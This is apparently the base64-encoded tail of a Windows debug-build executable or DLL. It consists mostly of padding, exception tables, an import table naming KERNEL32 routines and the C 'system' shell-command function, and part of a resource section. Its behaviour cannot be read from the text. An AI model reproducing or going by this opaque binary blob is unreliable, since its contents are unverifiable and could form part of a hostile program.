AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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XN0ZW0AAAQAX0NydERiZ1JlcG9ydAAFAF9DcnREYmdSZXBvcnRXAAB0AV9pbml0dGVybQB1AV9pbml0dGVybV9lAMECX3NlaF9maWx0ZXJfZGxsAHEBX2luaXRpYWxpemVfbmFycm93X2Vudmlyb25tZW50AAByAV9pbml0aWFsaXplX29uZXhpdF90YWJsZQAAtAJfcmVnaXN0ZXJfb25leGl0X2Z1bmN0aW9uAOUAX2V4ZWN1dGVfb25leGl0X3RhYmxlAMIAX2NydF9hdGV4aXQAwQBfY3J0X2F0X3F1aWNrX2V4aXQAAKQAX2NleGl0AABKBXRlcm1pbmF0ZQBoAF9fc3RkaW9fY29tbW9uX3ZzcHJpbnRmX3MAmwNfd21ha2VwYXRoX3MAALcDX3dzcGxpdHBhdGhfcwBjBXdjc2NweV9zAAB1Y3J0YmFzZWQuZGxsADAEUXVlcnlQZXJmb3JtYW5jZUNvdW50ZXIAEAJHZXRDdXJyZW50UHJvY2Vzc0lkABQCR2V0Q3VycmVudFRocmVhZElkAADdAkdldFN5c3RlbVRpbWVBc0ZpbGVUaW1lAFQDSW5pdGlhbGl6ZVNMaXN0SGVhZACuBFJ0bENhcHR1cmVDb250ZXh0ALUEUnRsTG9va3VwRnVuY3Rpb25FbnRyeQAAvARSdGxWaXJ0dWFsVW53aW5kAABqA0lzRGVidWdnZXJQcmVzZW50AJIFVW5oYW5kbGVkRXhjZXB0aW9uRmlsdGVyAABSBVNldFVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgDFAkdldFN0YXJ0dXBJbmZvVwBwA0lzUHJvY2Vzc29yRmVhdHVyZVByZXNlbnQAbQJHZXRNb2R1bGVIYW5kbGVXAABEBFJhaXNlRXhjZXB0aW9uAADUA011bHRpQnl0ZVRvV2lkZUNoYXIA3QVXaWRlQ2hhclRvTXVsdGlCeXRlAFYCR2V0TGFzdEVycm9yAAA4A0hlYXBBbGxvYwA8A0hlYXBGcmVlAACpAkdldFByb2Nlc3NIZWFwAACzBVZpcnR1YWxRdWVyeQAApAFGcmVlTGlicmFyeQCkAkdldFByb2NBZGRyZXNzAAAPAkdldEN1cnJlbnRQcm9jZXNzAHAFVGVybWluYXRlUHJvY2VzcwAAS0VSTkVMMzIuZGxsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAABkAAAA2AAAASQAAAAAAAABMAAAANwAAAAsAAAALAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAjEAGAAQAAAAAAAAAAAAAAbBIBgAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAYAAAAGAAAgAAAAAAAAAAAAAAAAAAAAQACAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAJBAAASAAAAHBRAgB9AQAAAAAAAAAAAAAAAAAAAAAAAAA